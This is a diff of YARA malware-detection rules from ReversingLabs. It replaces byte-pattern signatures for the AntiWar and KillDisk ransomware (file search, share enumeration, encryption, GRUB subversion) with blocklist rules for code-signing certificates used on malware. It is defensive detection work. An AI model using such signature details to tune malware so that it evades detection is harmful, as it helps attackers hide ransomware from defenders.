+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $set_environment ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AntiWar ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3113ec26-e149-527b-9478-4dd86c7fa464"
-		date = "2022-04-21"
-		modified = "2022-04-21"
+		id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11650-L11666"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7"
+		logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AntiWar"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ??
-            0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F
-            E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03
-            00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D
-            3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04
-            0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33
-            C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66
-            66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3
-        }
-		$find_files_p2 = {
-            E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83
-            C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC
-            4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ??
-            ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ??
-            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE
-            ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
-            45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF
-            90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C
-            ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ??
-            ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11
-            35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D
-        }
-		$find_files_p3 = {
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ??
-            ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ??
-            ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43
-            8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72
-            ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ??
-            48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B
-        }
-		$find_files_p4 = {
-            48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ??
-            72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ??
-            48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF
-            48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D
-            ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ??
-            ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ??
-            ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45
-            33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
-        }
-		$enum_shares = {
-            48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ??
-            ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42
-            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ??
-            48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54
-            24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ??
-            48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C
-            8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ??
-            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ??
-            ?? 48 83 C4 ?? C3
-        }
-		$encrypt_files_p1 = {
-            48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49
-            8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ??
-            ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80
-            A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D
-            95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48
-        }
-		$encrypt_files_p2 = {
-            8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74
-            24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ??
-            ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ??
-            45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ??
-            ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B
-            04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ??
-            ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B
-            0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ??
-            ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENS CORP" and pe.signatures [ i ] . serial == "34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11668-L11684"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_shares ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Dibies" and pe.signatures [ i ] . serial == "08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KillDisk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af6652dd-c668-5ae1-b51b-e272cb440c20"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "135d638c-9ee5-52cf-a6e7-c12e4feef594"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11686-L11704"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f"
+		logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KillDisk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B
-            85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ??
-            ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
-            85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0
-            48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ??
-            ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48
-            83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1
-        }
-		$encrypt_files_2 = {
-            EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89
-            CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ??
-            ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48
-            C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
-            85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
-            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
-            48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48
-            C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ??
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
-            ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33
-            34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$search_files = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ??
-            E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0
-            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ??
-            ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0
-            66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$subvert_grub_1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
-            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ??
